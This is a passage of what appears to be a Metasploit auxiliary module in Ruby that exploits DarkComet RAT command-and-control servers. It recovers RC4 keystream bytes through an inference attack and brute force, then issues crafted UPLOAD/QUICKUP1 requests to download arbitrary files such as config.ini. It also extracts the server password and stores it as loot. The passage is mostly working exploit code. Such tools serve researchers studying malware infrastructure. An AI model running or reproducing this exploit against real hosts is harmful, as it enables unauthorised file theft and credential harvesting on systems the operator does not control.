|
||||
idtype_msg = sock.get_once(12)
|
||||
|
||||
if idtype_msg.length != 12
|
||||
disconnect
|
||||
return nil
|
||||
end
|
||||
|
||||
keystream = get_keystream(idtype_msg, 'IDTYPE')
|
||||
server_msg = use_keystream('SERVER', keystream)
|
||||
sock.put(server_msg)
|
||||
|
||||
getsin_msg = sock.get_once(1024)
|
||||
disconnect
|
||||
getsin_msg
|
||||
end
|
||||
|
||||
# Carry out the crypto attack when we don't have a key
|
||||
def crypto_attack(exploit_string)
|
||||
getsin_msg = fetch_getsin
|
||||
if getsin_msg.nil?
|
||||
return nil
|
||||
end
|
||||
|
||||
getsin_kp = 'GetSIN' + datastore['LHOST'] + '|'
|
||||
keystream = get_keystream(getsin_msg, getsin_kp)
|
||||
|
||||
if keystream.length < exploit_string.length
|
||||
missing_bytecount = exploit_string.length - keystream.length
|
||||
|
||||
print_status("Missing #{missing_bytecount} bytes of keystream ...")
|
||||
|
||||
inferrence_segment = ''
|
||||
brute_max = 4
|
||||
|
||||
if missing_bytecount > brute_max
|
||||
print_status("Using inferrence attack ...")
|
||||
|
||||
# Offsets to monitor for changes
|
||||
target_offset_range = []
|
||||
for i in (keystream.length + brute_max)..(keystream.length + missing_bytecount - 1)
|
||||
target_offset_range << i
|
||||
end
|
||||
|
||||
# Store inference results
|
||||
inference_results = {}
|
||||
|
||||
# As long as we haven't fully recovered all offsets through inference
|
||||
# We keep our observation window in a circular buffer with 4 slots with the buffer running between [head, tail]
|
||||
getsin_observation = [''] * 4
|
||||
buffer_head = 0
|
||||
|
||||
for i in 0..2
|
||||
getsin_observation[i] = [fetch_getsin].pack('H*')
|
||||
Rex.sleep(0.5)
|
||||
end
|
||||
|
||||
buffer_tail = 3
|
||||
|
||||
# Actual inference attack happens here
|
||||
while !target_offset_range.empty?
|
||||
getsin_observation[buffer_tail] = [fetch_getsin].pack('H*')
|
||||
Rex.sleep(0.5)
|
||||
|
||||
# We check if we spot a change within a position between two consecutive items within our circular buffer
|
||||
# (assuming preceding entries are static in that position) we observed a 'carry', ie. our observed position went from 9 to 0
|
||||
target_offset_range.each do |x|
|
||||
index = buffer_head
|
||||
|
||||
while index != buffer_tail do
|
||||
next_index = (index + 1) % 4
|
||||
|
||||
# The condition we impose is that observed character x has to differ between two observations and the character left of it has to differ in those same
|
||||
# observations as well while being constant in at least one previous or subsequent observation
|
||||
if (getsin_observation[index][x] != getsin_observation[next_index][x]) && (getsin_observation[index][x - 1] != getsin_observation[next_index][x - 1]) && ((getsin_observation[(index - 1) % 4][x - 1] == getsin_observation[index][x - 1]) || (getsin_observation[next_index][x - 1] == getsin_observation[(next_index + 1) % 4][x - 1]))
|
||||
target_offset_range.delete(x)
|
||||
inference_results[x] = xor_strings(getsin_observation[index][x], '9')
|
||||
break
|
||||
end
|
||||
index = next_index
|
||||
end
|
||||
end
|
||||
|
||||
# Update circular buffer head & tail
|
||||
buffer_tail = (buffer_tail + 1) % 4
|
||||
# Move head to right once tail wraps around, discarding oldest item in circular buffer
|
||||
if buffer_tail == buffer_head
|
||||
buffer_head = (buffer_head + 1) % 4
|
||||
end
|
||||
end
|
||||
|
||||
# Inferrence attack done, reconstruct final keystream segment
|
||||
inf_seg = ["\x00"] * (keystream.length + missing_bytecount)
|
||||
inferrence_results.each do |x, val|
|
||||
inf_seg[x] = val
|
||||
end
|
||||
|
||||
inferrence_segment = inf_seg.slice(keystream.length + brute_max, inf_seg.length).join
|
||||
missing_bytecount = brute_max
|
||||
end
|
||||
|
||||
if missing_bytecount > brute_max
|
||||
print_status("Improper keystream recovery ...")
|
||||
return nil
|
||||
end
|
||||
|
||||
print_status("Initiating brute force ...")
|
||||
|
||||
# Bruteforce first missing_bytecount bytes of timestamp (maximum of brute_max)
|
||||
charset = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']
|
||||
char_range = missing_bytecount.times.map { charset }
|
||||
char_range.first.product(*char_range[1..-1]) do |x|
|
||||
p = x.join
|
||||
candidate_plaintext = getsin_kp + p
|
||||
candidate_keystream = get_keystream(getsin_msg, candidate_plaintext) + inferrence_segment
|
||||
filedata = try_exploit(exploit_string, candidate_keystream, true)
|
||||
|
||||
if !filedata.nil?
|
||||
return filedata
|
||||
end
|
||||
end
|
||||
return nil
|
||||
end
|
||||
|
||||
try_exploit(exploit_string, keystream, false)
|
||||
end
|
||||
|
||||
def parse_password(filedata)
|
||||
filedata.each_line { |line|
|
||||
elem = line.strip.split('=')
|
||||
if elem.length >= 1
|
||||
if elem[0] == 'PASSWD'
|
||||
if elem.length == 2
|
||||
return elem[1]
|
||||
else
|
||||
return ''
|
||||
end
|
||||
end
|
||||
end
|
||||
}
|
||||
return nil
|
||||
end
|
||||
|
||||
def run
|
||||
# Determine exploit string
|
||||
if datastore['NEWVERSION'] == true
|
||||
if (datastore['TARGETFILE'] != '') && (datastore['KEY'] != '')
|
||||
exploit_string = 'QUICKUP1|' + datastore['TARGETFILE'] + '|'
|
||||
else
|
||||
exploit_string = 'QUICKUP1|config.ini|'
|
||||
end
|
||||
elsif (datastore['TARGETFILE'] != '') && (datastore['KEY'] != '')
|
||||
exploit_string = 'UPLOAD' + datastore['TARGETFILE'] + '|1|1|'
|
||||
else
|
||||
exploit_string = 'UPLOADconfig.ini|1|1|'
|
||||
end
|
||||
|
||||
# Run exploit
|
||||
if datastore['KEY'] != ''
|
||||
filedata = try_exploit(exploit_string, nil, false)
|
||||
else
|
||||
filedata = crypto_attack(exploit_string)
|
||||
end
|
||||
|
||||
# Harvest interesting credentials, store loot
|
||||
if !filedata.nil?
|
||||
# Automatically try to extract password from config.ini if we haven't set a key yet
|
||||
if datastore['KEY'] == ''
|
||||
password = parse_password(filedata)
|
||||
if password.nil?
|
||||
print_status("Could not find password in config.ini ...")
|
||||
elsif password == ''
|
||||
print_status("C2 server uses empty password!")
|
||||
else
|
||||
print_status("C2 server uses password [#{password}]")
|
||||
end
|
||||
end
|
||||
|
||||
# Store to loot
|
||||
if datastore['STORE_LOOT'] == true
|
||||
print_status("Storing data to loot...")
|
||||
if (datastore['KEY'] == '') && (datastore['TARGETFILE'] != '')
|
||||
store_loot("darkcomet.file", "text/plain", datastore['RHOST'], filedata, 'config.ini', "DarkComet C2 server config file")
|
||||
else
|
||||
store_loot("darkcomet.file", "text/plain", datastore['RHOST'], filedata, datastore['TARGETFILE'], "File retrieved from DarkComet C2 server")
|
||||
end
|
||||
else
|
||||
print_status(filedata.to_s)
|
||||
end
|
||||
else
|
||||
print_status("Attack failed or empty config file encountered ...")
|
||||
end
|
||||
end
|
||||
end
|
Loading…
Add table
Reference in a new issue